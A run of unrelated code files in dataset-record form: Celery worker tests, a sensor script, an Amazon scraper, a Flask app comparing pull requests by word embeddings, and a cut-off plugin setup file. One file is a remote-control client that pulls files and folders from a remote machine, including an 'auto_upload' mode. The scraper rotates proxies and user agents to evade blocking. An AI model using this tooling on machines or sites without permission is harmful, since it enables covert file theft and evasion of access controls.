handler\n\n p = platforms.signals\n platforms.signals = Signals()\n try:\n w = self.Worker()\n w._isatty = False\n w.run_worker()\n for sig in 'SIGINT', 'SIGHUP', 'SIGTERM':\n self.assertIn(sig, handlers)\n\n handlers.clear()\n w = self.Worker()\n w._isatty = True\n w.run_worker()\n for sig in 'SIGINT', 'SIGTERM':\n self.assertIn(sig, handlers)\n self.assertNotIn('SIGHUP', handlers)\n finally:\n platforms.signals = p\n\n @disable_stdouts\n def test_startup_info(self):\n worker = self.Worker()\n worker.run()\n self.assertTrue(worker.startup_info())\n worker.loglevel = logging.DEBUG\n self.assertTrue(worker.startup_info())\n worker.loglevel = logging.INFO\n self.assertTrue(worker.startup_info())\n worker.autoscale = 13, 10\n self.assertTrue(worker.startup_info())\n\n worker = self.Worker(queues='foo,bar,baz,xuzzy,do,re,mi')\n app = worker.app\n prev, app.loader = app.loader, Mock()\n try:\n app.loader.__module__ = 'acme.baked_beans'\n self.assertTrue(worker.startup_info())\n 
finally:\n app.loader = prev\n\n prev, app.loader = app.loader, Mock()\n try:\n app.loader.__module__ = 'celery.loaders.foo'\n self.assertTrue(worker.startup_info())\n finally:\n app.loader = prev\n\n from celery.loaders.app import AppLoader\n prev, app.loader = app.loader, AppLoader()\n try:\n self.assertTrue(worker.startup_info())\n finally:\n app.loader = prev\n\n worker.send_events = True\n self.assertTrue(worker.startup_info())\n\n # test when there are too few output lines\n # to draft the ascii art onto\n prev, cd.ARTLINES = cd.ARTLINES, ['the quick brown fox']\n self.assertTrue(worker.startup_info())\n\n @disable_stdouts\n def test_run(self):\n self.Worker().run()\n self.Worker(purge=True).run()\n worker = self.Worker()\n worker.run()\n\n prev, cd.IGNORE_ERRORS = cd.IGNORE_ERRORS, (KeyError, )\n try:\n worker.run_worker = Mock()\n worker.run_worker.side_effect = KeyError()\n worker.run()\n finally:\n cd.IGNORE_ERRORS = prev\n\n @disable_stdouts\n def test_purge_messages(self):\n self.Worker().purge_messages()\n\n @disable_stdouts\n def test_init_queues(self):\n app = current_app\n c = app.conf\n p, app.amqp.queues = app.amqp.queues, app.amqp.Queues({\n 'celery': {'exchange': 'celery',\n 'routing_key': 'celery'},\n 'video': {'exchange': 'video',\n 'routing_key': 'video'}})\n try:\n worker = self.Worker(queues=['video'])\n worker.init_queues()\n self.assertIn('video', app.amqp.queues)\n self.assertIn('video', app.amqp.queues.consume_from)\n self.assertIn('celery', app.amqp.queues)\n self.assertNotIn('celery', app.amqp.queues.consume_from)\n\n c.CELERY_CREATE_MISSING_QUEUES = False\n del(app.amqp.queues)\n with self.assertRaises(ImproperlyConfigured):\n self.Worker(queues=['image']).init_queues()\n del(app.amqp.queues)\n c.CELERY_CREATE_MISSING_QUEUES = True\n worker = self.Worker(queues=['image'])\n worker.init_queues()\n self.assertIn('image', app.amqp.queues.consume_from)\n self.assertEqual(Queue('image', Exchange('image'),\n routing_key='image'), app.amqp.queues['image'])\n finally:\n app.amqp.queues = p\n\n @disable_stdouts\n def test_autoscale_argument(self):\n worker1 = self.Worker(autoscale='10,3')\n self.assertListEqual(worker1.autoscale, [10, 3])\n worker2 = self.Worker(autoscale='10')\n self.assertListEqual(worker2.autoscale, [10, 0])\n\n def test_include_argument(self):\n worker1 = self.Worker(include='some.module')\n self.assertListEqual(worker1.include, ['some.module'])\n worker2 = self.Worker(include='some.module,another.package')\n self.assertListEqual(\n worker2.include,\n ['some.module', 'another.package'],\n )\n self.Worker(include=['os', 'sys'])\n\n @disable_stdouts\n def test_unknown_loglevel(self):\n with self.assertRaises(SystemExit):\n WorkerCommand(app=self.app).run(loglevel='ALIEN')\n worker1 = self.Worker(loglevel=0xFFFF)\n self.assertEqual(worker1.loglevel, 0xFFFF)\n\n def test_warns_if_running_as_privileged_user(self):\n app = current_app\n if app.IS_WINDOWS:\n raise SkipTest('Not applicable on Windows')\n\n def getuid():\n return 0\n\n prev, os.getuid = os.getuid, getuid\n try:\n with self.assertWarnsRegex(\n RuntimeWarning,\n r'superuser privileges is discouraged'):\n worker = self.Worker()\n worker.run()\n finally:\n os.getuid = prev\n\n @disable_stdouts\n def test_redirect_stdouts(self):\n worker = self.Worker()\n worker.redirect_stdouts = False\n worker.setup_logging()\n with self.assertRaises(AttributeError):\n sys.stdout.logger\n\n def test_redirect_stdouts_already_handled(self):\n logging_setup = [False]\n\n @signals.setup_logging.connect\n def 
on_logging_setup(**kwargs):\n logging_setup[0] = True\n\n try:\n worker = self.Worker()\n worker.app.log.__class__._setup = False\n worker.setup_logging()\n self.assertTrue(logging_setup[0])\n with self.assertRaises(AttributeError):\n sys.stdout.logger\n finally:\n signals.setup_logging.disconnect(on_logging_setup)\n\n @disable_stdouts\n def test_platform_tweaks_osx(self):\n\n class OSXWorker(Worker):\n proxy_workaround_installed = False\n\n def osx_proxy_detection_workaround(self):\n self.proxy_workaround_installed = True\n\n worker = OSXWorker(redirect_stdouts=False)\n\n def install_HUP_nosupport(controller):\n controller.hup_not_supported_installed = True\n\n class Controller(object):\n pass\n\n prev = cd.install_HUP_not_supported_handler\n cd.install_HUP_not_supported_handler = install_HUP_nosupport\n try:\n worker.app.IS_OSX = True\n controller = Controller()\n worker.install_platform_tweaks(controller)\n self.assertTrue(controller.hup_not_supported_installed)\n self.assertTrue(worker.proxy_workaround_installed)\n finally:\n cd.install_HUP_not_supported_handler = prev\n\n @disable_stdouts\n def test_general_platform_tweaks(self):\n\n restart_worker_handler_installed = [False]\n\n def install_worker_restart_handler(worker):\n restart_worker_handler_installed[0] = True\n\n class Controller(object):\n pass\n\n prev = cd.install_worker_restart_handler\n cd.install_worker_restart_handler = install_worker_restart_handler\n try:\n worker = self.Worker()\n worker.app.IS_OSX = False\n worker.install_platform_tweaks(Controller())\n self.assertTrue(restart_worker_handler_installed[0])\n finally:\n cd.install_worker_restart_handler = prev\n\n @disable_stdouts\n def test_on_consumer_ready(self):\n worker_ready_sent = [False]\n\n @signals.worker_ready.connect\n def on_worker_ready(**kwargs):\n worker_ready_sent[0] = True\n\n self.Worker().on_consumer_ready(object())\n self.assertTrue(worker_ready_sent[0])\n\n\nclass test_funs(WorkerAppCase):\n\n def test_active_thread_count(self):\n self.assertTrue(cd.active_thread_count())\n\n @disable_stdouts\n def test_set_process_status(self):\n try:\n __import__('setproctitle')\n except ImportError:\n raise SkipTest('setproctitle not installed')\n worker = Worker(hostname='xyzza')\n prev1, sys.argv = sys.argv, ['Arg0']\n try:\n st = worker.set_process_status('Running')\n self.assertIn('celeryd', st)\n self.assertIn('xyzza', st)\n self.assertIn('Running', st)\n prev2, sys.argv = sys.argv, ['Arg0', 'Arg1']\n try:\n st = worker.set_process_status('Running')\n self.assertIn('celeryd', st)\n self.assertIn('xyzza', st)\n self.assertIn('Running', st)\n self.assertIn('Arg1', st)\n finally:\n sys.argv = prev2\n finally:\n sys.argv = prev1\n\n @disable_stdouts\n def test_parse_options(self):\n cmd = WorkerCommand()\n cmd.app = current_app\n opts, args = cmd.parse_options('celeryd', ['--concurrency=512'])\n self.assertEqual(opts.concurrency, 512)\n\n @disable_stdouts\n def test_main(self):\n p, cd.Worker = cd.Worker, Worker\n s, sys.argv = sys.argv, ['celeryd', '--discard']\n try:\n celeryd_main()\n finally:\n cd.Worker = p\n sys.argv = s\n\n\nclass test_signal_handlers(WorkerAppCase):\n\n class _Worker(object):\n stopped = False\n terminated = False\n\n def stop(self, in_sighandler=False):\n self.stopped = True\n\n def terminate(self, in_sighandler=False):\n self.terminated = True\n\n def psig(self, fun, *args, **kwargs):\n handlers = {}\n\n class Signals(platforms.Signals):\n def __setitem__(self, sig, handler):\n handlers[sig] = handler\n\n p, platforms.signals = 
platforms.signals, Signals()\n try:\n fun(*args, **kwargs)\n return handlers\n finally:\n platforms.signals = p\n\n @disable_stdouts\n def test_worker_int_handler(self):\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_int_handler, worker)\n next_handlers = {}\n state.should_stop = False\n state.should_terminate = False\n\n class Signals(platforms.Signals):\n\n def __setitem__(self, sig, handler):\n next_handlers[sig] = handler\n\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n p, platforms.signals = platforms.signals, Signals()\n try:\n handlers['SIGINT']('SIGINT', object())\n self.assertTrue(state.should_stop)\n finally:\n platforms.signals = p\n state.should_stop = False\n\n try:\n next_handlers['SIGINT']('SIGINT', object())\n self.assertTrue(state.should_terminate)\n finally:\n state.should_terminate = False\n\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n p, platforms.signals = platforms.signals, Signals()\n try:\n with self.assertRaises(SystemExit):\n handlers['SIGINT']('SIGINT', object())\n finally:\n platforms.signals = p\n\n with self.assertRaises(SystemTerminate):\n next_handlers['SIGINT']('SIGINT', object())\n\n @disable_stdouts\n def test_worker_int_handler_only_stop_MainProcess(self):\n try:\n import _multiprocessing # noqa\n except ImportError:\n raise SkipTest('only relevant for multiprocessing')\n process = current_process()\n name, process.name = process.name, 'OtherProcess'\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n try:\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_int_handler, worker)\n handlers['SIGINT']('SIGINT', object())\n self.assertTrue(state.should_stop)\n finally:\n process.name = name\n state.should_stop = False\n\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n try:\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_int_handler, worker)\n with self.assertRaises(SystemExit):\n handlers['SIGINT']('SIGINT', object())\n finally:\n process.name = name\n state.should_stop = False\n\n @disable_stdouts\n def test_install_HUP_not_supported_handler(self):\n worker = self._Worker()\n handlers = self.psig(cd.install_HUP_not_supported_handler, worker)\n handlers['SIGHUP']('SIGHUP', object())\n\n @disable_stdouts\n def test_worker_term_hard_handler_only_stop_MainProcess(self):\n try:\n import _multiprocessing # noqa\n except ImportError:\n raise SkipTest('only relevant for multiprocessing')\n process = current_process()\n name, process.name = process.name, 'OtherProcess'\n try:\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(\n cd.install_worker_term_hard_handler, worker)\n try:\n handlers['SIGQUIT']('SIGQUIT', object())\n self.assertTrue(state.should_terminate)\n finally:\n state.should_terminate = False\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(\n cd.install_worker_term_hard_handler, worker)\n with self.assertRaises(SystemTerminate):\n handlers['SIGQUIT']('SIGQUIT', object())\n finally:\n process.name = name\n\n @disable_stdouts\n def test_worker_term_handler_when_threads(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n try:\n handlers['SIGTERM']('SIGTERM', object())\n 
self.assertTrue(state.should_stop)\n finally:\n state.should_stop = False\n\n @disable_stdouts\n def test_worker_term_handler_when_single_thread(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n try:\n with self.assertRaises(SystemExit):\n handlers['SIGTERM']('SIGTERM', object())\n finally:\n state.should_stop = False\n\n @patch('sys.__stderr__')\n @skip_if_pypy\n @skip_if_jython\n def test_worker_cry_handler(self, stderr):\n if sys.version_info > (2, 5):\n handlers = self.psig(cd.install_cry_handler)\n self.assertIsNone(handlers['SIGUSR1']('SIGUSR1', object()))\n self.assertTrue(stderr.write.called)\n else:\n raise SkipTest('Needs Python 2.5 or later')\n\n @disable_stdouts\n def test_worker_term_handler_only_stop_MainProcess(self):\n try:\n import _multiprocessing # noqa\n except ImportError:\n raise SkipTest('only relevant for multiprocessing')\n process = current_process()\n name, process.name = process.name, 'OtherProcess'\n try:\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n handlers['SIGTERM']('SIGTERM', object())\n self.assertTrue(state.should_stop)\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n with self.assertRaises(SystemExit):\n handlers['SIGTERM']('SIGTERM', object())\n finally:\n process.name = name\n state.should_stop = False\n\n @disable_stdouts\n @patch('atexit.register')\n @patch('os.fork')\n @patch('os.close')\n def test_worker_restart_handler(self, _close, fork, register):\n fork.return_value = 0\n if getattr(os, 'execv', None) is None:\n raise SkipTest('platform does not have excv')\n argv = []\n\n def _execv(*args):\n argv.extend(args)\n\n execv, os.execv = os.execv, _execv\n try:\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_restart_handler, worker)\n handlers['SIGHUP']('SIGHUP', object())\n self.assertTrue(state.should_stop)\n self.assertTrue(register.called)\n callback = register.call_args[0][0]\n callback()\n self.assertTrue(argv)\n argv[:] = []\n fork.return_value = 1\n callback()\n self.assertFalse(argv)\n finally:\n os.execv = execv\n state.should_stop = False\n\n @disable_stdouts\n def test_worker_term_hard_handler_when_threaded(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_hard_handler, worker)\n try:\n handlers['SIGQUIT']('SIGQUIT', object())\n self.assertTrue(state.should_terminate)\n finally:\n state.should_terminate = False\n\n @disable_stdouts\n def test_worker_term_hard_handler_when_single_threaded(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_hard_handler, worker)\n with self.assertRaises(SystemTerminate):\n handlers['SIGQUIT']('SIGQUIT', object())\n","repo_name":"jiangningCX/cpython_forum","sub_path":"build/celery/celery/tests/bin/test_celeryd.py","file_name":"test_celeryd.py","file_ext":"py","file_size_in_byte":22999,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"36169885848","text":"from Phidgets.Devices.InterfaceKit import InterfaceKit\nimport time\n\nkit = 
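
The celery test record above repeatedly uses a `psig` helper that swaps `platforms.signals` for a recording `Signals` object, so a test can assert which signal handlers a worker installs without touching real process state. The capture trick in isolation (a simplified sketch, independent of celery):

```python
captured = {}

class RecordingSignals:
    def __setitem__(self, sig, handler):
        # record the registration instead of installing a real handler
        captured[sig] = handler

def install_handlers(signals):
    # stands in for the code under test that registers signal handlers
    signals['SIGTERM'] = lambda signum, frame: 'stop'
    signals['SIGINT'] = lambda signum, frame: 'interrupt'

install_handlers(RecordingSignals())
print(sorted(captured))  # ['SIGINT', 'SIGTERM']
```
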
InterfaceKit()\n\nkit.openPhidget()\n#kit.enableLogging(6,'phid_log.out')\nkit.waitForAttach(2000)\n\ns = dict() \ns['sens'] = np.zeros((1,2))\ns['start_time'] = time.time()\nsec_of_dat = 600\nf_s = 60\nerr_ind = []\nfor i in range(sec_of_dat*f_s):\n s['tic'] = time.time()\n\n sensdat = np.zeros((1,2))\n try:\n sensdat[0,0] = kit.getSensorValue(0)/1000.\n sensdat[0,1] = kit.getSensorValue(1)/1000.\n except:\n print(time.time() - s['start_time'], i)\n print(kit.isAttached())\n err_ind.extend([i])\n\n try:\n print(kit.getSensorRawValue(2), kit.getSensorValue(2))\n except:\n print('novalue')\n\n s['sens'] = np.vstack((s['sens'], sensdat))\n left_over_time = np.max([0, 1000/60. - (time.time() - s['tic'])])\n time.sleep(left_over_time/1000.)\nkit.closePhidget()\nplt.plot(np.array(err_ind)/float(f_s))\n\n\n","repo_name":"carmenalab/brain-python-interface","sub_path":"tests/test_phidgets_joystick_acqu.py","file_name":"test_phidgets_joystick_acqu.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"22685230746","text":"from time import sleep\n\nimport requests\nfrom selectorlib import Extractor\n\nfrom ScrapeAssistance.DataManager import DataManager\nfrom ScrapeAssistance.ProxyGenerator import ProxyGenerator\nfrom ScrapeAssistance.UserAgentGenerator import UserAgentGenerator\nfrom ScrapeAssistance.properties import PATH_YML\n\n\nclass ScrapeGift:\n\n def __init__(self, url: str):\n self.url = url[:url.find('?')]\n\n @staticmethod\n def _get_header():\n return {\n 'authority': 'www.amazon.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': UserAgentGenerator().user_agent_random_choice(),\n 'referrer': 'https://google.com',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Pragma': 'no-cache',\n }\n\n @staticmethod\n def _get_proxy():\n return {'https': ProxyGenerator().ip_random_choice()}\n\n def get_parameters(self):\n headers = self._get_header()\n proxy = self._get_proxy()\n selector = Extractor.from_yaml_file(PATH_YML)\n return {\n 'headers': headers,\n 'proxy': proxy,\n 'selector': selector\n }\n\n def scrape_data_json(self, file_name: str):\n while True:\n parameters = self.get_parameters()\n try:\n html = requests.get(\n self.url,\n timeout=7,\n headers=parameters['headers'],\n proxies=parameters['proxy']\n )\n print(html)\n if html.status_code == 200:\n print(\"[INFO] status: 200\")\n data = parameters['selector'].extract(html.text)\n DataManager().download_data_as_json(data, file_name=file_name)\n return data\n print(\"[INFO] Sleeping...\")\n sleep(5)\n except requests.exceptions.Timeout:\n print(\"[INFO] Timeout... Retrying connection\")\n sleep(5)\n continue\n except requests.exceptions.ProxyError:\n print(\"[INFO] Proxy failed... Retrying connection\")\n sleep(5)\n continue\n except requests.exceptions.SSLError:\n print(\"[INFO] SSL verification failed... 
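
The Phidgets acquisition loop above targets 60 Hz but mixes units: `1000/60.` is a period in milliseconds while `time.time() - s['tic']` is in seconds (and `np`/`plt` are used without being imported). A unit-consistent fixed-rate loop, with everything in seconds (a sketch, not the original script):

```python
import time

PERIOD = 1 / 60.0  # target sampling period in seconds (60 Hz)

for _ in range(10):
    tic = time.time()
    # ... read the sensors here ...
    left_over = PERIOD - (time.time() - tic)
    if left_over > 0:
        time.sleep(left_over)  # sleep away whatever remains of this period
```
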
Retrying connection\")\n sleep(5)\n continue\n except requests.exceptions.HTTPError as error:\n raise SystemExit(error)\n","repo_name":"gerardovitale/gift-scraping","sub_path":"ScrapeGift.py","file_name":"ScrapeGift.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43898253154","text":"import re\nfrom flask import Flask, render_template, request, redirect, url_for\nimport pull_request_getter\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import text\nfrom sklearn.metrics.pairwise import cosine_similarity, euclidean_distances\nimport pandas as pd\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\n\nCORPUS_PATH = './skipgram/corpus.txt'\nmodel = load_model('./skipgram/models/skipgram_model.h5')\n\nword_embedding_layer = model.get_layer(index=2)\nword_embedding_weights = word_embedding_layer.get_weights()[0][1:]\n\ndef yield_strings(file_path=CORPUS_PATH):\n with open(file_path, 'r') as f:\n for line in f:\n yield line.strip()\n\ntokenizer = text.Tokenizer()\ntokenizer.fit_on_texts(yield_strings(CORPUS_PATH))\n\nword2idx = tokenizer.word_index\n\nidx2word = {v: k for k, v in word2idx.items()}\nword_ids = [[word2idx[w] for w in text.text_to_word_sequence(s)] for s in yield_strings('skipgram/corpus.txt')]\n\ndef compare_prs(pr_1, pr_2, algorithm):\n pr_1_data = pull_request_getter.get_pull_request(pr_1)\n pr_1_body = parse_body(pr_1_data.body)\n pr_2_data = pull_request_getter.get_pull_request(pr_2)\n pr_2_body = parse_body(pr_2_data.body)\n\n if algorithm == 'average':\n return average_prs(pr_1_body, pr_2_body)\n elif algorithm == 'wordmover':\n return wordmover(pr_1_body, pr_2_body)\n # elif algorithm == 'nn':\n # return nn_algo(pr_1_body, pr_2_body)\n else:\n return 'Invalid algorithm'\n\ndef parse_body(body):\n body = re.sub(r'https?://[^\\s]+', 'LINK', body)\n body = re.sub(r'!\\[.*\\]\\(.*\\)', 'IMAGE', body)\n body = re.sub(r'```.*```', 'CODE', body)\n return body\n\ndef average_prs(pr_1_body, pr_2_body):\n pr_1_tokens = tokenizer.texts_to_sequences([pr_1_body])[0]\n pr_2_tokens = tokenizer.texts_to_sequences([pr_2_body])[0]\n print(pr_1_tokens)\n pr_1_body_embedding = np.mean(word_embedding_weights[pr_1_tokens], axis=0)\n pr_2_body_embedding = np.mean(word_embedding_weights[pr_2_tokens], axis=0)\n print(np.linalg.norm(pr_1_body_embedding - pr_2_body_embedding))\n return np.linalg.norm(pr_1_body_embedding - pr_2_body_embedding)\n\ndef wordmover(pr_1_body, pr_2_body):\n pr_1_body = tokenizer.texts_to_sequences([pr_1_body])[0]\n pr_2_body = tokenizer.texts_to_sequences([pr_2_body])[0]\n smaller_body = pr_1_body if len(pr_1_body) < len(pr_2_body) else pr_2_body\n larger_body = pr_1_body if len(pr_1_body) > len(pr_2_body) else pr_2_body\n move_cost = 0\n for word in smaller_body:\n move_cost += calculate_move_cost(word, larger_body)\n print(move_cost)\n return move_cost\n\n\n\ndef calculate_move_cost(word_1, larger_body):\n word_1_embedding = word_embedding_weights[word_1]\n min_cost = float('inf')\n for word_2 in larger_body:\n word_2_embedding = word_embedding_weights[word_2]\n cost = np.linalg.norm(word_1_embedding - word_2_embedding)\n if cost < min_cost:\n min_cost = cost\n return min_cost\n\ndef create_dataframe(sample_words):\n distance_matrix = euclidean_distances(word_embedding_weights)\n similar_words = {\n search_term: [idx2word[idx] for idx in distance_matrix[word2idx[search_term] - 1].argsort()[1:6] 
+ 1]\n for search_term in sample_words.lower().split()}\n\n words = sum([[k] + v for k, v in similar_words.items()], [])\n words_ids = [word2idx[w] for w in words]\n word_vectors = np.array([word_embedding_weights[idx] for idx in words_ids])\n\n tsne = TSNE(n_components=2, random_state=0, n_iter=10000, perplexity=3)\n np.set_printoptions(suppress=True)\n T = tsne.fit_transform(word_vectors)\n labels = words\n\n plt.figure(figsize=(14, 8))\n plt.scatter(T[:, 0], T[:, 1], c='steelblue', edgecolors='k')\n for label, x, y in zip(labels, T[:, 0], T[:, 1]):\n plt.annotate(label, xy=(x + 1, y + 1), xytext=(0, 0), textcoords='offset points')\n plt.savefig('static/tsne.png')\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef homepage():\n return render_template('home.html')\n\n@app.route('/', methods=['POST'])\ndef run_algorithm():\n if request.method == 'POST':\n pr_1 = request.form['pr_1']\n pr_2 = request.form['pr_2']\n algorithm = request.form['algorithm']\n result = compare_prs(pr_1, pr_2, algorithm)\n return redirect(url_for('compare_pr_result', result=result))\n\n@app.route('/compare_prs/<result>')\ndef compare_pr_result(result):\n return render_template('compare_prs.html', result=result)\n\n@app.route('/embeddings')\ndef embeddings_page():\n return render_template('embeddings.html')\n\n@app.route('/embeddings', methods=['POST'])\ndef embeddings_post():\n if request.method == 'POST':\n sample_words = request.form['sample_words']\n create_dataframe(sample_words)\n return redirect(url_for('embeddings_result'))\n\n\n@app.route('/embeddings/data')\ndef embeddings_result():\n return render_template('embeddings_result.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ConnBreathnach/GithubProject","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71870794007","text":"from message import Message, Header, Command\nfrom client import Client\nfrom time import sleep\nimport threading\n\n_commands = set(item.value for item in Command)\n\n\ndef connection_with_server(_client):\n while True:\n try:\n # Try to send message from queue\n if len(_client.queue_send) > 0:\n _client.log('Sending command to server...')\n msg = _client.queue_send.pop(0)\n _client.send_message(msg)\n\n # Try to process message from queue\n if len(_client.queue_receive) > 0:\n msg = _client.queue_receive.pop(0)\n\n if msg.header == Header.IDLE:\n _client.log('Remote Client not connected!')\n\n if msg.header == Header.RESPONSE:\n _handle_response(msg, _client.log)\n\n if msg.header == Header.AUTO_UPLOAD:\n with open(msg.payload[0], 'wb') as file:\n file.write(msg.payload[1])\n _client.log(f\"File saved as: {msg.payload[0]}\")\n\n except ConnectionError:\n _client.connected_to_server = False\n _client.log('Connection with server failed!')\n\n sleep(0.1)\n\n\ndef _handle_response(msg, log):\n log(f'Response from command: {msg.command.name}')\n\n if isinstance(msg.payload, Exception):\n log('Exception occurred!')\n log(msg.payload)\n return\n\n if msg.command in [Command.UPLOAD_FILE, Command.UPLOAD_FOLDER]:\n file_name = msg.payload[0] + ('.zip' if msg.command == Command.UPLOAD_FOLDER else '')\n with open(file_name, 'wb') as file:\n file.write(msg.payload[1])\n log(f\"File saved as: {file_name}\")\n\n else:\n if isinstance(msg.payload, str):\n print(msg.payload)\n\n\ndef command_thread(_client):\n _current_remote_path = ''\n\n while True:\n if not _client.connected_to_server:\n 
continue\n\n # Get input command from console\n str_input = input(f\"{_current_remote_path}>\")\n args = str_input.split(' ')\n str_command = args.pop(0)\n\n if str_command == 'help':\n print('AVAILABLE COMMANDS:\\n' +\n 'exit\\n' +\n 'cd\\n' +\n 'cd..\\n' +\n 'auto_upload\\n' +\n str(_commands))\n continue\n\n if str_command == 'cd':\n if(len(_current_remote_path)>0):\n _current_remote_path += f'\\\\{args.pop(0)}'\n else:\n _current_remote_path = args.pop(0)\n continue\n\n if str_command == 'cd..':\n while(len(_current_remote_path) > 0 and _current_remote_path[-1] != '\\\\'):\n _current_remote_path = _current_remote_path[:-1]\n _current_remote_path = _current_remote_path[:-1]\n continue\n\n if str_command == 'auto_upload':\n _client.queue_send.append(Message(Header.AUTO_UPLOAD))\n pass\n\n if str_command == 'exit':\n _client.queue_send.append(Message(Header.EXIT))\n continue\n\n if str_command not in _commands:\n if str_command != '':\n _client.log(f'Command \"{str_command}\" not found.')\n continue\n\n command = Command(str_command)\n if(len(_current_remote_path) > 0):\n _remote_path = _current_remote_path + '\\\\' + ' '.join(args)\n else:\n _remote_path = ' '.join(args)\n\n msg = Message(Header.COMMAND, command)\n\n if command == Command.DOWNLOAD_FILE:\n file_path = input(\"Enter file path: \")\n try:\n with open(file_path, 'rb') as file:\n data = file.read()\n msg.payload = (_remote_path, data)\n except Exception as e:\n print(e)\n else:\n msg.payload = _remote_path\n\n _client.queue_send.append(msg)\n\n\nif __name__ == \"__main__\":\n # _client = Client('Local Client', '127.0.0.1', 55554)\n _client = Client('Local Client', 'server_ip', 55554)\n\n _command_thread = threading.Thread(target=command_thread, args=[_client])\n _command_thread.start()\n\n connection_with_server(_client)\n","repo_name":"adrian-slimak/simple-client-server-client","sub_path":"source/local_client.py","file_name":"local_client.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6244491348","text":"\n'''\nAmplitude measured when the driving force is below the natural frequency.\n\nNote: this fit does not work well because the measured data is unreliable.\n\n'''\nimport wave\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n\ndef expo(x, a): #x is k\n # y=y0*a(e^(kx))\n return a*(np.e**(x))\n # return a*x\n # return ((a*np.exp(2))+(x*np.exp(2))*(b*np.exp(2)))*np.exp(1/2)\ndef twoExpo(x,a):\n return a*(np.e**x-np.e**(-1*x))\n\namp = np.array([0.052,0.034,0.02,0.009,0.005,0.002,0.002,0.001,0])*100\ndistance = np.arange(160,-20,-20) #0-180 with steps of 20\namp = np.array([2*np.e**0,2*np.e**1,2*np.e**2])\ndistance = np.array([0,1,2])\ny0 = 0.052 #this is the driving amplitude\n\nprint(expo(2,1))\n# popt, pcov = curve_fit(expo, distance, amp);\n# plt.plot(distance, expo(distance, *popt), label='fit: a=%5.10f' %tuple(popt))\npopt, pcov = curve_fit(expo, distance, amp);\nplt.plot(distance, expo(distance, *popt), label='fit: a=%5.10f' %tuple(popt))\nplt.plot(distance,amp)\n# plt.gca().invert_xaxis()\nplt.legend()\nplt.show()\n\n# #k = 2pi/lambda\n# omega_sqare = np.power(omega,2)\n# waveLength = np.array([1.1, 0.725,0.635,0.513])\n# k = (2*np.pi)/waveLength\n# k_unc = np.array([0.003, 0.006,0.008,0.01])*np.exp(2) #for error bars on the squared graph, square the uncertainty too\n# omega_unc = np.array([0.6,0.7,0.9,1]) *np.exp(2)\n\n# k_square = np.power(k,2)\n# popt, pcov = curve_fit(func1, omega_sqare, 
k_square)\n\n# print(func1(1,1,1))\n# # plt.plot(k_square, omega_sqare)\n# # plt.plot(k_square,omega_sqare, label ='measured')\n# plt.errorbar(k_square,omega_sqare, xerr=k_unc,yerr=omega_unc, label='measured')\n# plt.plot(k_square, func1(k_square, *popt), 'r-', label='fit: \\u03C90=%5.3f, c=%5.3f' % tuple(popt))\n# # plt.errorbar(k_square, func1(k_square, *popt), yerr=10)\n# # # curve = func1(k,pcov[0,0]**(0.5),pcov[1,1]**(0.5))\n# # plt.plot(k,func1(k, *popt))\n# plt.legend()\n# plt.show()\n\n\n","repo_name":"trossossp3/PHY293","sub_path":"slinky/part5.py","file_name":"part5.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12790969501","text":"#\n# THIS FILE IS PART OF THE MUMBLES PROJECT AND IS LICENSED UNDER THE GPL.\n# SEE THE 'COPYING' FILE FOR DETAILS\n#\n# Generic Mumbles Plugin\n#\n#------------------------------------------------------------------------\n\nfrom setuptools import setup\nimport sys, os\nfrom shutil import copy\n\n__author__ = 'aegis '\n__doc__ = 'A core function plugin for mumbles'\n__version__ = 